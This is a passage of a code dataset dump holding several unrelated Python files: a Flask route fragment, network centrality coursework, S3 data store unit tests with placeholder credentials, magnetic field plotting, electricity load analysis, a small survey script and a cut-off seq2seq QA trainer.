get(g.game.id)\n\n@games_controller.route('/delete', methods=['DELETE'])\ndef delete():\n g.game.delete()\n db.session.commit()\n return jsonify({ 'success': 'true' }), 200\n\n@games_controller.route('/players')\ndef players():\n return jsonify({'players': [p.serialize() for p in g.game.all_players()]})\n\n@games_controller.route('/roles')\ndef roles():\n return jsonify({'roles': [r.serialize() for r in g.game.roles()]})","sub_path":"app/controllers/games_controller.py","file_name":"games_controller.py","file_ext":"py","file_size_in_byte":2352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"594787441","text":"from searching import binary_string_list\nimport timeit\na_list =['florida','beautifully','gradual','station','sour','apple','safety', 'simple','skilled','core',\n 'transport','pick','anxiously','practically','profession', 'courage','Sunday','funeral','inside','generously']\nfor i in a_list:\n binary_string_list.list_object.append(i)\nprint(binary_string_list.list_object)\nprint(\"timeit test using one of the words in the list looking for the word 'simple'\")\nt = timeit.Timer(\"binary_string_list.BinaryStringList.binary_search('pick')\", \"import binary_string_list\")\nresults = t.repeat(5, 1000000)\nfor i, item in enumerate(results):\n print(i, \"\\t\", item)\nprint(\"timeit test using one of the words NOT in the list looking for the word 'dimple'\")\nt = timeit.Timer(\"binary_string_list.BinaryStringList.binary_search('dimple')\", \"import binary_string_list\")\nresults = t.repeat(5, 1000000)\nfor i, item in enumerate(results):\n print(i, \"\\t\", item)\n","sub_path":"searching/binary_test.py","file_name":"binary_test.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"75669505","text":"# -*- coding: utf-8 -*-\n\"\"\"\nPython coding template for CS-E5740 Complex Networks problem 3.3 (Basic\ncentrality measures).\nWritten by Onerva Korhonen.\n\nOriginal example code created on Mon Aug 25 10:23:54 2014.\nModified to create template 20.10.2015.\nTemplate updated 19.10.2016.\n\n@author: aokorhon\n\"\"\"\nimport numpy as np\nimport networkx as nx\nimport matplotlib.pylab as plt\nfrom matplotlib import gridspec\nfrom ex3.colorbar_help import add_colorbar\nimport pickle\n\n\ndef read_network(network_path: str) -> nx.graph:\n \"\"\"\n Reads a given network.\n\n Parameters\n ----------\n network_path: network edge list path (string)\n\n Returns\n -------\n network: NetworkX weighted graph object\n \"\"\"\n return nx.read_weighted_edgelist(path=network_path)\n\n\ndef read_unweighted_network(network_path: str) -> nx.graph:\n \"\"\"\n Reads a given network.\n\n Parameters\n ----------\n network_path: network edge list path (string)\n\n Returns\n -------\n network: NetworkX graph object\n \"\"\"\n return nx.read_edgelist(path=network_path)\n\n\ndef get_centrality_measures(network: nx.Graph, tol: float):\n \"\"\"\n Calculates five centrality measures (degree, betweenness, closeness, and\n eigenvector centrality, and k-shell) for the nodes of the given network.\n\n use NetworkX functions to obtain centrality measure dictionaries\n sort the dictionary values into arrays in the order given by\n network.nodes().\n Hint: make use of get method of dictionaries.\n\n Parameters\n ----------\n network: networkx.Graph()\n tol: tolerance parameter to calculate eigenvector centrality, float\n\n Returns\n --------\n [degree, betweenness, closeness, eigenvector_centrality, kshell]: list of\n lists\n \"\"\"\n\n degree, betweenness, closeness, eigenvector_centrality, kshell = [], [], [], [], []\n betweenness_dict = nx.betweenness_centrality(network)\n closeness_dict = nx.closeness_centrality(network)\n eigenvector_centrality_dict = nx.eigenvector_centrality(network, tol=tol)\n kshell_dict = nx.core_number(network)\n\n for n in network.nodes_iter():\n degree.append(network.degree(n))\n betweenness.append(betweenness_dict[n])\n closeness.append(closeness_dict[n])\n eigenvector_centrality.append(eigenvector_centrality_dict[n])\n kshell.append(kshell_dict[n])\n\n return [degree, betweenness, closeness, eigenvector_centrality, kshell]\n\n\ndef create_scatter(x_values, y_values, x_label, y_label, labels, markers, fig, figure_path: str):\n \"\"\"\n Creates a scatter plot of y_values as a function of x_values. \n\n Note that y_values is a list of lists and this function plots the y_values of each list\n against the same x_values.\n\n Parameters\n ----------\n x_values: np.array\n y_values: list of lists\n x_label: string\n y_label: string\n a generic label of the y axis\n labels: list of strings\n labels of scatter plots\n markers: list of strings\n figure_path: string\n\n Returns\n -------\n No direct output, saves the scatter plot at given figure_path\n \"\"\"\n assert len(x_values) > 0, 'Bad input x_values for creating a scatter plot'\n\n ax = fig.add_subplot(111)\n ax.set_xlabel(x_label)\n ax.set_ylabel(y_label)\n\n for (y_value, label, marker) in zip(y_values, labels, markers):\n ax.scatter(x=x_values, y=y_value, label=label, marker=marker, s=40)\n\n ax.legend(loc='best')\n plt.savefig(figure_path, bbox_inches='tight')\n print('Scatter plot ready!')\n\n\ndef visualize_on_network(network, node_values, coords_path, fig,\n titles, figure_path, cmap='OrRd',\n node_size=50, font_size=8, scale=500):\n \"\"\"\n Creates visualizations of the network with nodes color coded by each of the\n node values sets.\n\n Parameters\n ----------\n network: networkx.Graph()\n node_values: list of lists\n coords_path: path to a file containing node coordinates\n fig: matplotlib.pyplot.figure()\n titles: list of strings\n figure_path: string\n cmap: string\n node_size: int\n font_size: int\n scale: int\n used to calculate the spring layout for node positions\n\n Returns\n -------\n No direct output, saves the network visualizations at given path\n \"\"\"\n assert len(node_values[0]) > 0, \"there should be multiple values per node\"\n\n # This is the grid for 5 pictures\n gs = gridspec.GridSpec(3, 4, width_ratios=(20, 1, 20, 1))\n network_gs_indices = [(0, 0), (0, 2), (1, 0), (1, 2), (2, 0)]\n cbar_gs_indices = [(0, 1), (0, 3), (1, 1), (1, 3), (2, 1)]\n\n # Loading coordinates from the file\n with open(coords_path, 'rb') as f:\n coords = pickle.load(f, encoding='latin1')\n\n # Loop over different value sets\n for node_val, title, network_gs_index, cb_gs_index in zip(node_values,\n titles,\n network_gs_indices,\n cbar_gs_indices):\n # Draw the network figure\n ax = plt.subplot(gs[network_gs_index[0], network_gs_index[1]])\n nx.draw(network, pos=coords, node_color=node_val, cmap=cmap,\n node_size=int(node_size), font_size=font_size)\n\n # Draw the colorbar (cb)\n cb_ax = plt.subplot(gs[cb_gs_index[0], cb_gs_index[1]])\n add_colorbar(node_val, cb_ax=cb_ax)\n\n ax.set_title(title)\n\n plt.tight_layout()\n plt.savefig(figure_path, format='pdf', bbox_inches='tight')\n print('Network visualizations ready!')\n\n\ndef main():\n KARATE = \"karate_club_network\"\n\n network_paths = [\n \"small_cayley_tree.edg\",\n \"small_lattice.edg\",\n \"small_ring.edg\",\n \"karate_club_network_edge_file.edg\"\n ]\n\n coords_paths = [\n 'small_cayley_tree_coords.pkl',\n 'small_lattice_coords.pkl',\n 'small_ring_coords.pkl',\n 'karate_club_coords.pkl'\n ]\n\n network_names = ['small_cayley_tree', 'lattice', 'small_ring', KARATE]\n x_label = 'degree'\n y_label = 'centrality measure'\n\n labels = ['betweenness', 'closeness', 'k-shell', 'eigenvector centrality']\n markers = ['.', 'x', '+', 'o']\n scatter_base_path = 'graphs/centrality/'\n titles = ['small cayley tree', 'larger lattice', 'small ring', 'karate club network']\n network_fig_base_path = scatter_base_path\n fig_index = 0\n tol = 10 ** -1 # tolerance parameter for calculating eigenvector centrality\n\n # Loop through all networks\n for (network_path, network_name, coords_path) in zip(network_paths, network_names, coords_paths):\n network = \\\n (read_network(network_path) if network_name == KARATE else read_unweighted_network(network_path))\n\n # Calculating centrality measures\n [degree, betweenness, closeness, eigenvector_centrality, kshell] = get_centrality_measures(network, tol=tol)\n kshell_normalized = np.divide(kshell, float(max(kshell))) # normalization for easier visualization\n\n # Scatter plot\n y_values = [betweenness, closeness, eigenvector_centrality, kshell_normalized]\n scatter_path = scatter_base_path + '_' + network_name + '.pdf'\n scatter_fig = plt.figure(fig_index)\n fig_index = fig_index + 1\n\n create_scatter(\n x_values=degree,\n y_values=y_values,\n x_label=x_label,\n y_label=y_label,\n labels=labels,\n markers=markers,\n fig=scatter_fig,\n figure_path=scatter_path,\n )\n\n # Network figures\n network_fig = plt.figure(fig_index)\n fig_index = fig_index + 1\n network_figure_path = network_fig_base_path + '_networks_' + network_name + '.pdf'\n all_cvalues = [degree, betweenness, closeness, eigenvector_centrality, kshell_normalized]\n\n visualize_on_network(\n network=network,\n node_values=all_cvalues,\n coords_path=coords_path,\n fig=network_fig,\n titles=[\"degree\", \"betweenness\", \"closeness\", \"eigenvector_centrality\", \"kshell\"],\n figure_path=network_figure_path\n )\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"ex3/ex3/basic_centrality_measures.py","file_name":"basic_centrality_measures.py","file_ext":"py","file_size_in_byte":8229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"99041011","text":"# -*- coding: utf-8 -*-\nimport utils, os, excel_template\nimport spold2_reader as spold2\nfolder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\SRI\\data collection\\SRI_BR_agric\\LUC'\nfilename = 'BR-datasets_20180413.xlsx'\ntab = 'Sheet1'\ndataset_list = list(utils.read_excel(folder, filename, tab)['list'])\nversion = '20180411'\nsystem_model = 'Undefined'\nfolder = utils.version_system_model_path(version, system_model)\nao = utils.pkl_load(os.path.join(folder, 'pkl'), 'ao')\nao_for_AL = utils.ao_for_AL(ao, 'id_to_activity_geo')\ndef to_apply(x):\n s = '{}, {}, {} - {}'.format(x[0], x[1], x[2].split('-')[0], x[3].split('-')[0])\n return s\nao['test'] = ao[['activityName', 'geography', 'startDate', 'endDate']].apply(to_apply, axis = 1)\nao = ao[ao['test'].isin(dataset_list)]\nfilelist = set(ao['filename'])\ndataset_folder = os.path.join(folder, 'datasets')\ndatasets = [spold2.Dataset(dataset_folder, filename, ao_for_AL = ao_for_AL) for filename in filelist]\nresult_folder = r'C:\\Dropbox (ecoinvent)\\ei-int\\technical\\external\\SRI\\data collection\\SRI_BR_agric\\LUC'\nresult_filename = 'BR_crops_without_LUC.xlsx'\nexcel_template.assemble_for_templates(datasets, result_folder, result_filename, \n ao_for_AL = ao_for_AL)","sub_path":"projects/LUC_brazil/8_extract_BR_crops.py","file_name":"8_extract_BR_crops.py","file_ext":"py","file_size_in_byte":1222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"109393201","text":"import unittest\n\nimport s3fs\nimport xarray as xr\n\nfrom test.s3test import S3Test, MOTO_SERVER_ENDPOINT_URL\nfrom xcube.core.new import new_cube\nfrom xcube.core.store import DatasetDescriptor\nfrom xcube.core.store import DataStoreError\nfrom xcube.core.store import TYPE_SPECIFIER_CUBE\nfrom xcube.core.store import TYPE_SPECIFIER_DATASET\nfrom xcube.core.store import TYPE_SPECIFIER_MULTILEVEL_DATASET\nfrom xcube.core.store import new_data_store\nfrom xcube.core.store.stores.s3 import S3DataStore\nfrom xcube.util.jsonschema import JsonObjectSchema\n\n\nBUCKET_NAME = 'xcube-test'\n\n\nclass S3DataStoreTest(S3Test):\n\n def setUp(self) -> None:\n super().setUp()\n self._store = new_data_store('s3',\n aws_access_key_id='test_fake_id',\n aws_secret_access_key='test_fake_secret',\n bucket_name=BUCKET_NAME,\n endpoint_url=MOTO_SERVER_ENDPOINT_URL)\n self.assertIsInstance(self.store, S3DataStore)\n\n @property\n def store(self) -> S3DataStore:\n # noinspection PyTypeChecker\n return self._store\n\n def test_props(self):\n self.assertIsInstance(self.store.s3, s3fs.S3FileSystem)\n self.assertEqual(BUCKET_NAME, self.store.bucket_name)\n\n def test_get_data_store_params_schema(self):\n schema = self.store.get_data_store_params_schema()\n self.assertEqual(\n {'anon',\n 'aws_access_key_id',\n 'aws_secret_access_key',\n 'aws_session_token',\n 'endpoint_url',\n 'profile_name',\n 'bucket_name',\n 'region_name'},\n set(schema.properties.keys())\n )\n self.assertEqual({'bucket_name'}, schema.required)\n\n def test_get_open_data_params_schema(self):\n schema = self.store.get_open_data_params_schema()\n self.assertEqual(\n {'chunks',\n 'consolidated',\n 'decode_cf',\n 'decode_coords',\n 'decode_times',\n 'drop_variables',\n 'group',\n 'mask_and_scale'},\n set(schema.properties.keys())\n )\n self.assertEqual(set(), schema.required)\n\n def test_get_search_params_schema(self):\n schema = self.store.get_search_params_schema()\n self.assertIsInstance(schema, JsonObjectSchema)\n self.assertEqual({}, schema.properties)\n self.assertEqual(False, schema.additional_properties)\n\n schema = self.store.get_search_params_schema(type_specifier='geodataframe')\n self.assertIsInstance(schema, JsonObjectSchema)\n self.assertEqual({}, schema.properties)\n self.assertEqual(False, schema.additional_properties)\n\n # TODO (forman): Fixme! Currently get boto3 errors when running out-commented test\n # def test_search_data(self):\n # result = list(self.store.search_data(type_specifier=TYPE_SPECIFIER_CUBE))\n # self.assertTrue(len(result) > 0)\n #\n # result = list(self.store.search_data(type_specifier=TYPE_SPECIFIER_DATASET))\n # self.assertTrue(len(result) > 0)\n #\n # with self.assertRaises(DataStoreError) as cm:\n # list(self.store.search_data(type_specifier=TYPE_SPECIFIER_DATASET,\n # time_range=['2020-03-01', '2020-03-04'], bbox=[52, 11, 54, 12]))\n # self.assertEqual('Unsupported search parameters: time_range, bbox', f'{cm.exception}')\n\n def test_get_write_data_params_schema(self):\n schema = self.store.get_write_data_params_schema()\n self.assertEqual(\n {'append_dim',\n 'group',\n 'consolidated',\n 'encoding'},\n set(schema.properties.keys())\n )\n self.assertEqual(set(), schema.required)\n\n def test_get_type_specifiers(self):\n self.assertEqual(('dataset',), self.store.get_type_specifiers())\n\n def test_get_data_opener_ids(self):\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids())\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids(type_specifier='dataset'))\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_opener_ids(type_specifier='*'))\n with self.assertRaises(ValueError) as cm:\n self.store.get_data_opener_ids(type_specifier='dataset[cube]')\n self.assertEqual(\"type_specifier must be one of ('dataset',)\", f'{cm.exception}')\n\n def test_get_data_writer_ids(self):\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids())\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids(type_specifier='dataset'))\n self.assertEqual(('dataset:zarr:s3',), self.store.get_data_writer_ids(type_specifier='*'))\n with self.assertRaises(ValueError) as cm:\n self.store.get_data_writer_ids(type_specifier='dataset[cube]')\n self.assertEqual(\"type_specifier must be one of ('dataset',)\", f'{cm.exception}')\n\n def test_data_registration(self):\n self.store.s3.mkdir(BUCKET_NAME)\n dataset = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.register_data(data_id='cube', data=dataset)\n self.assertTrue(self.store.has_data(data_id='cube'))\n self.assertTrue(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_DATASET))\n self.assertTrue(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_CUBE))\n self.assertFalse(self.store.has_data(data_id='cube',\n type_specifier=TYPE_SPECIFIER_MULTILEVEL_DATASET))\n self.store.deregister_data(data_id='cube')\n self.assertFalse(self.store.has_data(data_id='cube'))\n\n def test_write_and_describe_data_from_registry(self):\n self.store.s3.mkdir(BUCKET_NAME)\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n\n data_descriptor = self.store.describe_data('cube-1.zarr')\n self.assertIsInstance(data_descriptor, DatasetDescriptor)\n self.assertEqual('cube-1.zarr', data_descriptor.data_id)\n self.assertEqual(TYPE_SPECIFIER_CUBE, data_descriptor.type_specifier)\n self.assertEqual((-90.0, -180.0, 90.0, 180.0), data_descriptor.bbox)\n self.assertDictEqual(dict(bnds=2, lat=180, lon=360, time=5), data_descriptor.dims)\n self.assertEqual(('2010-01-01', '2010-01-06'),\n data_descriptor.time_range)\n self.assertEqual({'a', 'b'}, set(data_descriptor.data_vars.keys()))\n\n @unittest.skip('Currently fails on appveyor but not locally, execute on demand only')\n def test_write_and_describe_data_from_zarr_describer(self):\n self.store.s3.mkdir(BUCKET_NAME)\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n self.store.deregister_data('cube-1.zarr')\n\n data_descriptor = self.store.describe_data('cube-1.zarr')\n self.assertIsInstance(data_descriptor, DatasetDescriptor)\n self.assertEqual('cube-1.zarr', data_descriptor.data_id)\n self.assertEqual(TYPE_SPECIFIER_DATASET, data_descriptor.type_specifier)\n self.assertEqual((-90.0, -180.0, 90.0, 180.0), data_descriptor.bbox)\n self.assertDictEqual(dict(bnds=2, lat=180, lon=360, time=5), data_descriptor.dims)\n self.assertEqual(('2010-01-01T00:00:00', '2010-01-06T00:00:00'),\n data_descriptor.time_range)\n self.assertEqual({'a', 'b'}, set(data_descriptor.data_vars.keys()))\n\n @unittest.skip('Currently fails on travis but not locally, execute on demand only')\n def test_write_and_read_and_delete(self):\n self.store.s3.mkdir(BUCKET_NAME)\n\n dataset_1 = new_cube(variables=dict(a=4.1, b=7.4))\n dataset_2 = new_cube(variables=dict(c=5.2, d=8.5))\n dataset_3 = new_cube(variables=dict(e=6.3, f=9.6))\n\n # Write 3 cubes\n self.store.write_data(dataset_1, data_id='cube-1.zarr')\n self.store.write_data(dataset_2, data_id='cube-2.zarr')\n self.store.write_data(dataset_3, data_id='cube-3.zarr')\n\n self.assertTrue(self.store.has_data('cube-1.zarr'))\n self.assertTrue(self.store.has_data('cube-2.zarr'))\n self.assertTrue(self.store.has_data('cube-3.zarr'))\n\n self.assertIn(('cube-1.zarr', None), set(self.store.get_data_ids()))\n self.assertIn(('cube-2.zarr', None), set(self.store.get_data_ids()))\n self.assertIn(('cube-3.zarr', None), set(self.store.get_data_ids()))\n self.assertEqual(3, len(set(self.store.get_data_ids())))\n\n # Open the 3 written cubes\n opened_dataset_1 = self.store.open_data('cube-1.zarr')\n opened_dataset_2 = self.store.open_data('cube-2.zarr')\n opened_dataset_3 = self.store.open_data('cube-3.zarr')\n\n self.assertIsInstance(opened_dataset_1, xr.Dataset)\n self.assertIsInstance(opened_dataset_2, xr.Dataset)\n self.assertIsInstance(opened_dataset_3, xr.Dataset)\n\n self.assertEqual(set(dataset_1.data_vars), set(opened_dataset_1.data_vars))\n self.assertEqual(set(dataset_2.data_vars), set(opened_dataset_2.data_vars))\n self.assertEqual(set(dataset_3.data_vars), set(opened_dataset_3.data_vars))\n\n # Try overwriting existing cube 1\n dataset_4 = new_cube(variables=dict(g=7.4, h=10.7))\n with self.assertRaises(DataStoreError) as cm:\n self.store.write_data(dataset_4, data_id='cube-1.zarr')\n self.assertEqual(\"path '' contains a group\", f'{cm.exception}')\n # replace=True should do the trick\n self.store.write_data(dataset_4, data_id='cube-1.zarr', replace=True)\n opened_dataset_4 = self.store.open_data('cube-1.zarr')\n self.assertEqual(set(dataset_4.data_vars), set(opened_dataset_4.data_vars))\n\n # Try deleting cube 1\n self.store.delete_data('cube-1.zarr')\n self.assertEqual({('cube-2.zarr', None), ('cube-3.zarr', None)},\n set(self.store.get_data_ids()))\n self.assertFalse(self.store.has_data('cube-1.zarr'))\n\n # Now it should be save to also write with replace=False\n self.store.write_data(dataset_1, data_id='cube-1.zarr', replace=False)\n","sub_path":"test/core/store/stores/test_s3.py","file_name":"test_s3.py","file_ext":"py","file_size_in_byte":10415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"63922546","text":"import os\r\nos.chdir(\"C:/Users/jp7de/OneDrive/Desktop/Molecular Beam Slowing/Numerical B_Field/code\")\r\n\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom mpl_toolkits.mplot3d import Axes3D\r\nfrom scipy.optimize import curve_fit\r\nfrom collections import Iterable\r\nfrom textfile_functions import *\r\n\r\n\r\n## Generating Axis Coordinates \r\nx = np.linspace(-2.5, 2.5, num = 51) \r\ny = np.linspace(-2.5, 2.5,num = 51) \r\nz = np.linspace(0, 20, num = 41)\r\n\r\npoints = []\r\nfor i in range(len(x)):\r\n for j in range(len(y)):\r\n for k in range(len(z)):\r\n points.append((x[i], y[j], z[k]))\r\n\r\n\r\n## Analyzing Data\r\ndef flatten_list(list,ignore_types=(str)): \r\n \"\"\"\r\n Takes a nested list of any dimension and recursively \"flattens\" it out \r\n into a 1 dimension list.\r\n \r\n @type list: List Object\r\n @type ignore_types= (str): Ignores all string inputs\r\n @rtype: None\r\n \"\"\"\r\n for item in list:\r\n if isinstance(item, Iterable) and not isinstance(item, ignore_types):\r\n yield from flatten_list(item,ignore_types=(str))\r\n else:\r\n yield item\r\n \r\n\r\ndef generator_to_list(gen):\r\n \"\"\"\r\n Converts an abstract generator object into a list containing the same \r\n elements as the generator.\r\n \r\n @type gen: Generator object\r\n @rtype: List[items]\r\n \"\"\"\r\n temp_list = []\r\n for item in gen:\r\n temp_list.append(item)\r\n return temp_list\r\n \r\ndef list_to_numpy_matrix(xdim, ydim, bvalues):\r\n \"\"\"\r\n Converts a list of b field values into a xdim*ydim numpy matrix.\r\n \r\n @type xdim: List\r\n @type ydimL List\r\n @type bvalues: List\r\n @rtype: numpy array\r\n \"\"\"\r\n dim_list = []\r\n for i in range(len(xdim)):\r\n b_list = []\r\n for j in range(len(ydim)):\r\n b_list.append(bvalues.pop(0))\r\n temp_np = np.array(b_list)\r\n dim_list.append(temp_np)\r\n return np.array(dim_list)\r\n \r\n#Put in the name of your text file here.\r\nmag_values = load_txtfile(\"bnorm_actual.txt\")\r\n \r\n\r\n# Creates nested list of b-field values. \r\nbfields = [] #change to lst\r\nz_len = []\r\nfor i in range(len(z)):\r\n bfields.append([]) #change to lst\r\n z_len.append(i)\r\n\r\n#for some reason the mag values are being change when they're being popped\r\n#NEED TO FIX THIS!!!!\r\n# range value is len(mag_values) / len(z)\r\nloop_range = len(mag_values) // len(z)\r\nfor i in range(loop_range):\r\n for i in z_len:\r\n popped_value = mag_values.pop(0)\r\n bfields[i].append(popped_value)\r\n\r\n\r\nplz = list_to_numpy_matrix(x, y, bfields[0])\r\nplz2 = list_to_numpy_matrix(x, y, bfields[20])\r\nplz3 = list_to_numpy_matrix(x, y, bfields[40])\r\n\r\n \r\n## Plotting Figures\r\n# When the meshgrid is symmetric, ie size(x) = size(y), they can not all be named X,Y,Z\r\n# for each meshgrid, this the names are written to be cyclic and contain the dimensions of the grid\r\n\r\nXY, YX = np.meshgrid(x, y,indexing='ij', sparse=True)\r\nXZ, ZX = np.meshgrid(x, z,indexing='ij', sparse=True)\r\nYZ, ZY = np.meshgrid(y, z,indexing='ij', sparse=True)\r\nXYZ,YZX,ZXY = np.meshgrid(x,y,z,indexing='ij', sparse=True)\r\n\r\nfig = plt.figure(\"Z = 0\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nfig = plt.figure(\"Z = 10\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz2,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nfig = plt.figure(\"Z = 20\")\r\nax = fig.add_subplot(111, projection='3d')\r\nax.plot_surface(XY, YX, plz3,cmap='coolwarm')\r\nax.set_title('surface')\r\nax.set_xlabel(\"x [m]\")\r\nax.set_ylabel(\"y [m]\")\r\nax.set_zlabel(\"|B| [T]\")\r\n\r\nplt.show()\r\n\r\n\r\n\r\n\r\n","sub_path":"Molecular_beam_slowing/Code/Magnetic Field Plot/bfield_surfaceplot.py","file_name":"bfield_surfaceplot.py","file_ext":"py","file_size_in_byte":3813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"41410728","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 23 08:02:25 2021\n\n@author: patrickwickersham\n\"\"\"\n\nimport pandas as pd\n\n\nRTD = pd.read_csv(\"OASIS_Real_Time_Dispatch_Actual_Load_2021.csv\")\n\n# creates datetime dtype column RTD['date'] AND callable columns \n#for year,month,day,hour,and minute\n\ndate = pd.to_datetime(RTD['RTD End Time Stamp'])\n#year = date.dt.year\n#month = date.dt.month\n#day = date.dt.day\n#hour = date.dt.hour\n#minute = date.dt.minute\n#second = date.dt.second\n#RTD['PTID'] = RTD['Zone PTID']\n#RTD['rtd_load'] = RTD['RTD Actual Load']\nRTD['date'] = date\n#RTD['second'] = second\n#RTD['minute'] = minute\n#RTD['hour'] = hour\n#RTD['day'] = day\n#RTD['month'] = month\n#RTD['year'] = year\n\nRTD_2020_april = RTD.pivot(index='date',\n columns='Zone Name',\n values='RTD Actual Load')\n\n\n#%% add a Total column\nRTD_2020_april['Total'] = RTD_2020_april.sum(axis=1)\n\n\n#%% compute ramp rate\n\n\nramprate_2020_april = RTD_2020_april.diff()\n\n","sub_path":"april_past_load.py","file_name":"april_past_load.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"433298025","text":"# levantamento dos mouses\n# Declaração de variáveis\nquantidade_mouses = 0\nnecessita_esfera = 0\nnecessita_limpeza = 0\nnecessita_cabo = 0\nquebrado = 0\n# Entrada de dados\nidentificacao = int(input(\"Digite o id do mouse: \"))\nwhile identificacao != 0:\n print(\"Identifique o defeito: \")\n print(\"1 - Esfera\")\n print(\"2 - Limpeza\")\n print(\"3 - Cabo\")\n print(\"4 - Quebrado\")\n defeito = int(input(\"Digite o número do defeito: \"))\n if defeito == 1:\n necessita_esfera += 1\n elif defeito == 2:\n necessita_limpeza += 1\n elif defeito == 3:\n necessita_cabo += 1\n elif defeito == 4:\n quebrado += 1\n quantidade_mouses += 1\n identificacao = int(input(\"Digite o id do mouse: \"))\np1 = necessita_esfera / quantidade_mouses * 100\np2 = necessita_limpeza / quantidade_mouses * 100\np3 = necessita_cabo / quantidade_mouses * 100\np4 = quebrado / quantidade_mouses * 100\nprint(\"Situação Quantidade Percentual\")\nprint(f\"1)Troca de Esfera {necessita_esfera} {p1:.2f}%\")\nprint(f\"2)Necessita Limpeza {necessita_limpeza} {p2:.2f}%\")\nprint(f\"3)Troca de Cabo {necessita_cabo} {p3:.2f}%\")\nprint(f\"4)Quebrado {quebrado} {p4:.2f}%\")\n\n","sub_path":"Python_Logics/s7_ex7.py","file_name":"s7_ex7.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"251989785","text":"import time\nimport math\nfrom typing import Optional, List, Dict, Callable\n\nfrom transformers import (\n is_datasets_available,\n is_torch_tpu_available,\n)\nfrom transformers.trainer_utils import (\n PredictionOutput,\n speed_metrics,\n denumpify_detensorize,\n)\nfrom transformers.debug_utils import DebugOption\n\nfrom .base import Seq2SeqBaseTrainer\n\n\nif is_datasets_available():\n import datasets\n\nif is_torch_tpu_available():\n import torch_xla.core.xla_model as xm\n import torch_xla.debug.metrics as met\n\n\nclass QuestionAnsweringSeq2SeqTrainer(Seq2SeqBaseTrainer):\n\n def __init__(\n self,\n *args,\n eval_examples: datasets.Dataset = None,\n post_process_function: Callable = None,\n **kwargs\n ):\n \"\"\" QA Trainer for Seq2Seq(Generative) models\n\n Args:\n eval_examples (datasets.Dataset, optional): Examples for evaluation.\n post_process_function (Callable, optional): Post process function for model outputs.\n \"\"\"\n\n super().__init__(*args, **kwargs)\n self.eval_examples = eval_examples\n self.post_process_function = post_process_function\n\n def evaluate(\n self,\n eval_dataset: Optional[datasets.Dataset] = None,\n eval_examples: Optional[datasets.Dataset] = None,\n ignore_keys: Optional[List[str]] = None,\n metric_key_prefix: str = \"eval\",\n mode: str = \"evaluate\",\n max_length: Optional[int] = None,\n num_beams: Optional[int] = None,\n ) -> Dict[str, float]:\n \"\"\" Run evaluation and returns metrics.\n\n The calling script will be responsible for providing a method to compute metrics, as they are task-dependent\n (pass it to the init :obj:`compute_metrics` argument).\n\n You can also subclass and override this method to inject custom behavior.\n\n Args:\n eval_dataset (:obj:`Dataset`, `optional`):\n Pass a dataset if you wish to override :obj:`self.eval_dataset`. If it is an :obj:`datasets.Dataset`,\n columns not accepted by the ``model.forward()`` method are automatically removed. It must implement the\n :obj:`__len__` method.\n eval_examples (Optional[datasets.Dataset], optional): \n Origin eval datasets for post processing.\n ignore_keys (:obj:`List[str]`, `optional`):\n A list of keys in the output of your model (if it is a dictionary) that should be ignored when\n gathering predictions.\n metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`\"eval\"`):\n An optional prefix to be used as the metrics key prefix. For example the metrics \"bleu\" will be named\n \"eval_bleu\" if the prefix is ``\"eval\"`` (default)\n mode (str, optional): \n \"evaluate\" or \"predict\" mode for post processing function.\n max_length (:obj:`int`, `optional`):\n The maximum target length to use when predicting with the generate method.\n num_beams (:obj:`int`, `optional`):\n Number of beams for beam search that will be used when predicting with the generate method. 1 means no\n beam search.\n\n Returns:\n A dictionary containing the evaluation loss and the potential metrics computed from the predictions. The\n dictionary also contains the epoch number which comes from the training state.\n \"\"\"\n\n self._max_length = max_length if max_length is not None else self.args.generation_max_length\n self._num_beams = num_beams if num_beams is not None else self.args.generation_num_beams\n # memory metrics - must set up as early as possible\n self._memory_tracker.start()\n eval_dataset = self.eval_dataset if eval_dataset is None else eval_dataset\n eval_dataloader = self.get_eval_dataloader(eval_dataset)\n start_time = time.time()\n eval_examples = self.eval_examples if eval_examples is None else eval_examples\n # 일시적으로 metric computation를 불가능하게 한 상태이며, 해당 코드에서는 loop 내에서 metric 계산을 수행합니다.\n compute_metrics = self.compute_metrics\n self.compute_metrics = None\n eval_loop = 